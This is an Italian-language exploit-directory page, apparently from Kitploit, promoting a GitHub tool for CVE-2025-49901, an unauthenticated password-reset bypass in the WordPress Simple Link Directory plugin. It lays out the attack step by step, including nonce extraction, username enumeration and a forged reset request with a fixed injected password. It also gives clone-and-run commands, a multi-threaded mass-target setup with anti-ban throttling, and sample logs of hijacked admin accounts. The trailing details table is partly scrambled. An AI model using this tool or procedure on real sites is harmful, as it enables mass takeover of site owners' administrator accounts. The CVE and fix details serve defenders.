Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-49901 — WordPress Simple Link Directory Plugin < 14.8.1 è vulnerabile a un Broken Authentication ad alta priorità | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-49901
Autenticazione e AutorizzazioneRicognizioneAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni Web
GitHubnxploited/cve-2025-49901

CVE-2025-49901

WordPress Simple Link Directory Plugin < 14.8.1 è vulnerabile a un Broken Authentication ad alta priorità

Vedi Repository
4 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-49901

Il plugin WordPress Simple Link Directory < 14.8.1 è vulnerabile a una scadenza di autenticazione ad alta priorità

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║        CVE-2025-49901  ·  Simple Link Directory  ·  qc-opd       ║
║           Bypass Autenticazione → Reset Password → RCE           ║
╚═══════════════════════════════════════════════════════════════════╝

CVE CVSS Plugin Auth Python Author


▸ Vulnerabilità

Il modulo di reset password qc-opd esposto nelle pagine SLD accetta un nome utente e una nuova password senza verificare l'identità dell'utente tramite token, conferma email o controllo delle capacità. Un utente malintenzionato non autenticato può enumerare i nomi utente WordPress, inviare il modulo di reset per qualsiasi account e autenticarsi immediatamente con la password iniettata — ottenendo accesso amministrativo senza alcuna interazione da parte dell'utente bersaglio.


▸ Flusso dell'Attacco

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│  1. Individua pagina reset SLD                          │
│     Sonda 28+ percorsi → match: "sld" + "_wpnonce" + form│
│                                                         │
│  2. Estrai nonce                                        │
│     Analizza _wpnonce da HTML / JS / qc-opd-nonce       │
│                                                         │
│  3. Enumera nomi utente                                 │
│     /?author=1..10  +  /wp-json/wp/v2/users  + hostname │
│                                                         │
│  4. Reimposta password per ogni nome utente             │
│     POST qc-restore-pwd=restore                         │
│         qc-uid=<username>                               │
│         pass=newhackerpass123                           │
│         _wpnonce=<nonce>                                │
│                                                         │
│  5. Verifica accesso (doppia modalità)                  │
│     Modalità sessione  → controllo cookie + probe /wp-admin/│
│     Modalità password → wp-login.php + controllo pannello admin│
│                                                         │
│  6. Scrivi risultati confermati → scan_results/reset_mass_success.txt │
└─────────────────────────────────────────────────────────┘

▸ Configurazione

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-49901.git
cd CVE-2025-49901
pip install requests colorama urllib3
python3 CVE-2025-49901.py

requirements.txt

root@kitploit:~
requests>=2.28.0
colorama>=0.4.6
urllib3>=1.26.0

▸ Utilizzo

root@kitploit:~
File lista target          →  list.txt  (un host per riga)
Thread                     →  default 5
Timeout HTTP               →  default 10s
Ritardo per utente MIN/MAX →  throttle anti-ban (default 0.3 / 0.7s)
Ritardo tra siti           →  default 1.0s
File output                →  scan_results/reset_mass_success.txt

Formato target:

root@kitploit:~
https://target1.com
target2.com
http://target3.com/wordpress

Password fissa iniettata per tutti i reset:

root@kitploit:~
newhackerpass123

▸ Fonti di Enumerazione Nomi Utente

MetodoEndpoint
Reindirizzamento autore/?author=1 →

▸ Logica di Verifica Amministratore

Dopo ogni tentativo di reset, lo strumento verifica l'accesso utilizzando due metodi indipendenti:

root@kitploit:~
Modalità sessione   →  controlla cookie wordpress_logged_in + indicatori /wp-admin/
Modalità password  →  POST completo su wp-login.php + sonda multi-percorso pannello admin

Indicatori amministratore controllati:

root@kitploit:~
id="adminmenu"  ·  id="wpadminbar"  ·  id="wpwrap"
users.php  ·  plugins.php  ·  plugin-install-tab  ·  upload-plugin

▸ Formato Output Terminale

root@kitploit:~
[HH:MM:SS] [https://target.com] NONCE: OK   | RESET: OK   | ACCESS: 1 HIT
[HH:MM:SS] [https://target2.com] NONCE: FAIL | RESET: -    | ACCESS: 0 HIT

▸ File di Output

scan_results/reset_mass_success.txt

root@kitploit:~
[2025-06-01T14:22:10] https://target.com - account=admin  pass=newhackerpass123  mode=password
[2025-06-01T14:22:18] https://target.com - account=editor pass=newhackerpass123  mode=session

▸ Autore

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


▸ Disclaimer

root@kitploit:~
SOLO PER RICERCA DI SICUREZZA AUTORIZZATA E ISTRUZIONE.

L'autore non si assume alcuna responsabilità per l'uso contro sistemi
che l'operatore non possiede o per i quali non ha esplicita autorizzazione scritta al test.

L'uso non autorizzato viola il CFAA, il CMA e leggi equivalenti in tutto il mondo.
Sei l'unico responsabile delle tue azioni.

© 2025 Nxploited · Simple Link Directory < 14.8.1 · Corretto in 14.8.1

Scarica lo strumento
CVECVE-2025-49901
CVSS9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ADPCISA-ADP
Pluginquantumcloud Simple Link Directory (qc-simple-link-directory)
AffettoTutte le versioni < 14.8.1
AuthNessuna richiesta
TipoBypass dell'autenticazione tramite percorso alternativo (CWE-288)
CWECWE-288 · Bypass dell'autenticazione tramite percorso o canale alternativo
/?author=10
REST API/wp-json/wp/v2/users
HostnamePrimo label del dominio come fallback
Hardcodedadmin sempre incluso